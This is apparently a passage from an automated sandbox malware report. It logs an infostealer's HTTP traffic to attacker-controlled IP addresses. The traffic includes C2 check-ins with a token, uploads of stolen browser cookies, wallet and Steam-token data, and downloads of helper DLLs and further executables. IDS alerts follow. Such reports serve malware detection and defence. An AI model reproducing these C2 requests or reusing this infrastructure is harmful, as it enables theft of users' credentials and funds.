42 47 49 45 43 41 4b 4b 45 47 44 2d 2d 0d 0a Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="hwid"E55A112DEE9E487256326------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="build"tale------CBFIJEGIDBGIECAKKEGD--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGHHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 2d 2d 0d 0a Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="message"browsers------AFHIEBKKFHIEGCAKECGH--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"plugins------DBKKKEHDHCBFIEBFBGID--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 45 48 4a 45 42 41 41 46 49 44 48 4a 45 42 47 49 2d 2d 0d 0a Data Ascii: ------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------GDHIEHJEBAAFIDHJEBGIContent-Disposition: form-data; name="message"fplugins------GDHIEHJEBAAFIDHJEBGI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 31 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004156001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHIDAFHCBAKFCAAKFCFCHost: 185.215.113.206Content-Length: 6275Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 34 31 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1004157001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------GIJECGDGCBKECAKFBGCA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFCHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKJKJKKJDGDGDGIDGHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 4b 4a 4b 4a 4b 4b 4a 44 47 44 47 44 47 49 44 47 2d 2d 0d 0a Data Ascii: ------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GHDBKJKJKKJDGDGDGIDGContent-Disposition: form-data; name="file"------GHDBKJKJKKJDGDGDGIDG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="file"------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJJEBFCGDAKFIEBAAFBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4a 45 42 46 43 47 44 41 4b 46 49 45 42 41 41 46 42 2d 2d 0d 0a Data Ascii: ------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------KKJJEBFCGDAKFIEBAAFBContent-Disposition: form-data; name="message"wallets------KKJJEBFCGDAKFIEBAAFB--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJEHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="message"files------DBAEGCGCGIEGDHIDHJJE--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="file"------BFHJECAAAFHIJKFIJEGC--
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 65 36 65 62 31 38 61 32 65 39 66 63 37 65 66 35 38 63 34 66 34 39 34 66 33 34 33 63 39 31 31 37 66 63 30 33 66 38 36 31 35 35 34 38 36 33 64 37 64 39 32 30 62 61 61 66 36 65 64 34 39 38 33 61 66 39 63 61 30 64 33 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="token"2e6eb18a2e9fc7ef58c4f494f343c9117fc03f861554863d7d920baaf6ed4983af9ca0d3------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="message"ybncbhylepme------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 34.117.188.166 34.117.188.166

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49804 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49851 -> 185.215.113.16:80
